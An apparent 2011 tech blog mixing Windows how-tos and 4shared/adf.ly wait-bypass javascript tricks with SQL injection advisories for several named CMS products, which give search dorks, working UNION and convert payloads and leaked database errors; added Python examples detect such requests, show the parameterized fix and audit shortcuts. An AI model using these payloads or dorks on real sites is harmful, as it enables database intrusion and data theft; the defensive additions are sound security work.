Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set an Application to Always Run as Administrator in Windows 7
-----------------------------------------------------------------------

1 - Right-click the application that you want to run as administrator and choose Properties. Before that, make sure you have already created a shortcut for the application.
As an example, I created a cmd.exe shortcut on the Desktop. I want to run cmd.exe as administrator with just a click after this. No need to right-click, blalala.. wasting my time!


2 - Go to Shortcut tab and choose Advanced.
3 - Tick "Run as Administrator", and DONE!
  
Before as Administrator
After as Administrator. Just by a click!
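
What the tick box changes on disk, as an added example that is not part of the original post: it sets the RunAsUser bit (0x2000) in the LinkFlags field of the shortcut's header (Microsoft's MS-SHLLINK format), so a script can list which shortcuts always request elevation. The function names are this example's own, and `sample_header` builds constructed test data.

```python
import struct
from pathlib import Path

HEADER_SIZE = 0x4C                      # fixed size of the shell link header
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAGS_OFFSET = 0x14                     # LinkFlags, 32-bit little-endian
RUN_AS_USER = 0x00002000                # set by the "Run as administrator" tick box


def lnk_runs_elevated(data):
    """True/False for a valid shell link header, None if it is not a .lnk header."""
    if len(data) < HEADER_SIZE:
        return None
    (size,) = struct.unpack_from("<I", data, 0)
    if size != HEADER_SIZE or data[4:20] != LINK_CLSID:
        return None
    (flags,) = struct.unpack_from("<I", data, FLAGS_OFFSET)
    return bool(flags & RUN_AS_USER)


def audit_shortcuts(folder):
    """Return the shortcuts under `folder` that always request elevation."""
    hits = []
    for path in sorted(Path(folder).rglob("*.lnk")):
        with open(path, "rb") as fh:
            if lnk_runs_elevated(fh.read(HEADER_SIZE)):
                hits.append(str(path))
    return hits


def sample_header(flags):
    """Constructed 76-byte header for testing; every other field is zeroed."""
    return (struct.pack("<I", HEADER_SIZE) + LINK_CLSID
            + struct.pack("<I", flags) + bytes(HEADER_SIZE - 24))
```

Run `audit_shortcuts` over the Desktop and Start Menu folders to review which shortcuts carry the flag.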

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps


http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-


CarRentals CMS Vulnerable to SQL Injection


Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps


http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+


thanks,
-p0pc0rn-

Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps


http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters that need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -
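
For spotting requests like the ones in these advisories in web access logs, here is an added example (not part of the original posts). It unwraps MySQL versioned comments such as `/*!12345union*/` before matching, because a plain `union select` pattern misses that form. The rule names and the sample log entries are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL executes the body of /*!NNNNN ... */, so unwrap it instead of deleting it.
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
_COMMENT = re.compile(r"/\*.*?\*/", re.S)

_RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("mssql-convert-error", re.compile(r"\bconvert\s*\(\s*int\s*,.*@@\w+")),
    ("info-function", re.compile(r"\b(user|database|version)\s*\(\s*\)")),
]


def normalize(value):
    """Lower-case, unwrap versioned comments, drop plain ones, collapse spaces."""
    v = _VERSIONED.sub(r" \1 ", value.lower())
    v = _COMMENT.sub(" ", v)
    return " ".join(v.split())


def scan_request(path):
    """Return {parameter: [rule names]} for one request path from an access log."""
    findings = {}
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        text = normalize(raw)
        hits = [rule for rule, rx in _RULES if rx.search(text)]
        if raw.count("'") % 2:  # noisy on its own (O'Brien); weigh with other hits
            hits.append("unbalanced-quote")
        if hits:
            findings[name] = hits
    return findings


# Constructed log entries that reuse the request shapes from the posts above.
SAMPLE_REQUESTS = [
    "/index.php?id=7",
    "/book-offer.php?offer_id=-1'%20/*!12345union*/%20select%201,version(),3--+",
    "/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))",
    "/Subnews.cfm?newsid=1'",
]


def scan_all(requests=SAMPLE_REQUESTS):
    """Map each flagged request to its findings; clean requests are omitted."""
    return {r: scan_request(r) for r in requests if scan_request(r)}
```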

shoma.net Web Design Vulnerable to Multiple SQL Injection


Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps


http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]

There are more parameters that need to be checked.

#####
#POC#
#####

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


- p0pc0rn -

Tuesday, July 26, 2011

Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections


Title : Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections
Vendor: http://www.infotrex.net
Dork : intext:"Web Development by Infotrex Solutions"


+++++++++++++++++++++++++++++++
Microsoft Access Injection +
+++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 - http://www.site.com/details.asp?catid=[]&subcatid=[]&pid=[SQL] +
2 - http://www.site.com/news.asp?action=read&nID=[SQL] +
3 - http://www.site.com/product.asp?catid=[SQL] +
4 - http://www.site.com/contents.asp?id=[SQL] +
5 - http://www.site.com/details.asp?pid=[SQL] +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Thanks,
p0pc0rn
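
The flaw shared by the advisories above, next to its fix, as an added example that is not part of the original posts: the request parameter is concatenated into the SQL text, and database errors are shown to the client. It uses Python with an in-memory SQLite database as a stand-in for the PHP, ASP and ColdFusion back ends; the table, the function names and the two probe strings are constructed for the demo.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for a CMS database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Home')")
    return db


def get_page_vulnerable(db, page_id):
    # Flawed pattern behind ...?id=[SQL]: input concatenated into the SQL text.
    sql = "SELECT id, title FROM pages WHERE id = '" + page_id + "'"
    return db.execute(sql).fetchall()


def get_page_safe(db, page_id):
    # 1) Allow-list: the parameter is a numeric key, so reject anything else.
    if not re.fullmatch(r"[0-9]{1,9}", page_id):
        return []
    # 2) Bound parameter: the value is sent as data, never parsed as SQL.
    return db.execute("SELECT id, title FROM pages WHERE id = ?",
                      (int(page_id),)).fetchall()


def leaks_db_error(handler, db, value):
    """True if the handler lets a database error escape to the caller,
    which is what the quoted OLE DB / JDBC error pages show happening."""
    try:
        handler(db, value)
        return False
    except sqlite3.Error:
        return True


# Constructed inputs with the same shape as the requests in the advisories.
QUOTE_PROBE = "1'"
UNION_PROBE = "-1' UNION SELECT 99, 'not a page row'--"
```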

Tuesday, July 5, 2011

4shared Downloader

How to use?

1 - Make sure you have an account on 4shared.com.. just a free account :)
2 - Log in to your account

3 - Open a command prompt and just run this Python script :)

Usage : 4shared.py Url


4 - It will open the download link in your browser; just click Save


Here's the script
http://pastebin.com/2eDsyjm9

Friday, July 1, 2011

Adf.ly Bypass

Hate waiting even 5 secs?
Want to bypass the waiting time?
It's easy.
As an example, say you want to download this:
http://adf.ly/1wuNc
Go to the link, and in the URL bar type this:
javascript:showSkip();
The countdown will be skipped and you can get the real link directly :)

4shared Download Tricks

There are two tricks you can use to download a file from 4shared.com.
Let's say we want to download this:
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
We can:
1 - Bypass the waiting time.
Go to the download page:
http://www.4shared.com/get/fTg3hpDR/a_byte_of_python__persian_tran.html
and in the URL bar type this:
javascript:alert(c=0)
This will cut the waiting time from 59 secs to 0 secs :)

Another way is:

2 - Get the download URL directly.
On the file page
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
you just need to type this in the URL bar:
javascript:alert(startDownload)

The download link will pop up; just copy and paste it into the URL bar to download :)
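
Both tricks rely on the wait and the final link being held in the page's own JavaScript, where the visitor can change or read them. As an added example (not part of the original post, and not 4shared's code), here is a server-side version of the wait: the download page hands out a signed ticket, and the link is released only when the ticket is authentic and 59 seconds old. The key, the ticket format and the function names are assumptions of this sketch.

```python
import hashlib
import hmac
import time

SECRET = b"constructed-demo-key"  # placeholder; a real key never leaves the server
WAIT_SECONDS = 59                 # the wait mentioned in the post


def _tag(file_id, issued):
    msg = f"{file_id}:{issued}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_ticket(file_id, now=None):
    """Called when the download page is served; records when the wait began."""
    issued = int(time.time() if now is None else now)
    return f"{file_id}:{issued}:{_tag(file_id, issued)}"


def redeem_ticket(ticket, now=None):
    """Return the file id if the ticket is authentic and the wait is over, else None."""
    now = time.time() if now is None else now
    try:
        file_id, issued, tag = ticket.rsplit(":", 2)
        issued_at = int(issued)
    except ValueError:
        return None  # malformed ticket
    expected = _tag(file_id, issued)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None  # issue time or file id was altered
    if now - issued_at < WAIT_SECONDS:
        return None  # the clock that counts is the server's
    return file_id
```

The real download URL is looked up only after `redeem_ticket` succeeds, so it is never present in the page while the countdown runs.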

Unix Command in Windows???


Yeah, there's a little secret that you might not know about Windows 7. We can use Unix commands in Windows without using Cygwin! Believe it?
Let's look at it together.

The name of this technology? It used to be called Interix, then became Services for UNIX (SFU) as they added more bits on top of Interix, and is now known as Subsystem for UNIX-based Applications (SUA). The current name is more of a mouthful, but is a more accurate name.


So, to run SUA, you need one of the following versions of Windows:
Windows Server 2008
Windows Server 2003 R2
Windows 7 - Enterprise or Ultimate Edition
Windows Vista - Enterprise or Ultimate Edition

Other than that? Doesn't work :(

How to enable SUA? [I'm using Windows 7 Ultimate as the example in this case]

1 - Go to the Control Panel.
2 - Browse to Programs and Features.
3 - Click Turn Windows features on or off.
4 - Select the check box for Subsystem for UNIX-based Applications.
5 - Click OK
6 - In the start menu, click All Programs > Subsystem for UNIX-based Applications > Download Utilities for Subsystem for UNIX-based Applications
7 - Download the SUA installer from the Microsoft website. In my case, I downloaded this --> Utilities and SDK for UNIX-based Applications_X86.exe. Choose the one that suits your PC.
8 - Once downloaded, double-click Utilities and SDK for UNIX-based Applications_X86.exe in your downloads folder.
9 - Go through the auto-installer.
10 - I'd recommend you choose the custom setup and enable the GNU Utilities and then, in the following step, select all three check boxes to allow su to root, enable setuid and enable case sensitivity.
11 - Finished! And now you can run UNIX commands.